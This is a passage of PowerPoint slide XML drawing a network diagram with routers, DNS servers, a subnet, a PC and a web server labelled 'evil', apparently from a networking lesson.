                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819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t-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9267" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382392FE-2640-EAC0-BDD1-5D3EF9A7F431}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9268" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{071D4ED0-88CD-344B-58FE-F7445B83CA18}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97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5">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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69" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1001A607-F1A1-F352-353E-107821984569}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 1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32">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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70" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148D3B77-BBAD-5484-DDC6-EBFB933710A6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28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2" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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71" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C26F29ED-CA01-B276-8C5B-8E2643B48E9E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 1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4">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9265" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2755FEC4-57F5-BE5E-997E-BB5F17D2227D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2881" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9272" name="Connettore diritto 9271">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEF2E11D-952C-4DAA-A0C2-D3C62C1776B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2670433" y="3667061"/>
            <a:ext cx="248187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4" name="Connettore diritto 9273">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B09911-DE28-BE89-41D9-800C83983424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="41" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2788398" y="4164547"/>
            <a:ext cx="2388820" cy="154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278" name="Gruppo 9277">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7767D69B-DAEF-2A08-DC85-A43B70F9FC80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2180000" y="3348604"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9279" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6B3D883-A75B-80AB-524C-310012B9822C}"/>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9280" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{905A3A30-D697-1155-692C-FD59D9DB2FCA}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="9281" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7FA4546-42CE-3F97-70A0-52B44E07EEDE}"/>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DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9282" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32527307-9815-2623-FEB3-086F1A7EB122}"/>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dnsroot</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9283" name="Gruppo 9282">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC51D299-8D02-D6B9-9826-2F847287CAE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6310508" y="1227608"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9284" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBE5E28B-C166-B816-6517-1DC98623F413}"/>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9285" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E52EB56-CEBF-153E-4409-F3B3036DD555}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="9286" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58CC6008-71FA-F2BD-391D-362ECFDF8D11}"/>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DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9287" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E82B8F4-7243-CCE7-E3B3-3C3EA24D487D}"/>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dnsuni</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9288" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B8E2A2C-4F10-CF1A-B4A9-C6BD53870C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3087815" y="3547893"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9289" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E1C573-61A8-94C6-A74A-E6542949D26C}"/>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90" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BC4F817-20B3-1728-4BEB-9734C8986009}"/>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5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9291" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40562160-B9D4-68AA-BC83-8A373C7E076D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3109411" y="4016212"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9292" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3175C2-881A-5E36-5A32-EB04121611E9}"/>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93" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF3BF253-7AEF-3EBE-A5FC-4249CB82AE41}"/>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
        <p:nvSpPr>
          <p:cNvPr id="9295" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0878E97B-B026-CE8F-2AC7-34E28C691F57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076643" y="3780075"/>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C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9296" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF93EA8F-C55D-4CAB-9ADF-2DA45F950ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712201" y="3761897"/>
            <a:ext cx="106631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10.0.3.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9300" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{991019C6-902B-1002-417E-49382A291A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1245708" y="2923524"/>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E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9302" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B64CFD6-BA4C-4303-5968-C9BBA9A7571F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4936638" y="5924428"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9303" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96ABC08E-DE60-5197-A698-B5B1CA419E3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04" name="Text Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D8B64ED-9033-27FA-AFE7-C997853B692D}"/>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pc4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9309" name="Gruppo 9308">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7535EF32-5446-1894-1BD9-6D66617DB8C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1862910" y="1768735"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9310" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBA9568D-7B79-5ACF-B22A-FF6AA8AC7C14}"/>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evil</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9311" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1519D788-1EA3-0FA8-39DF-A2B10D949F88}"/>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9312" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7EABE16-DABC-9FA7-E810-172E9C75E13D}"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9313" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47625D34-0CF2-6643-957F-84E432018133}"/>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WEB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9314" name="Connettore diritto 9313">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68A257B1-D9AE-7DF7-AD4C-034B689E80C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9310" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316509" y="2363536"/>
            <a:ext cx="9207" cy="6703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19" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5DBC4CF-EC74-6C11-DDDE-523600F9EF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2155594" y="2539339"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9320" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94416D98-2121-7E0A-60F1-6848EBF83938}"/>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321" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44B8C8EF-9766-E15E-103B-7B5123E253DC}"/>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50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9325" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C84DF885-15B0-4727-E8BD-648408A90B49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
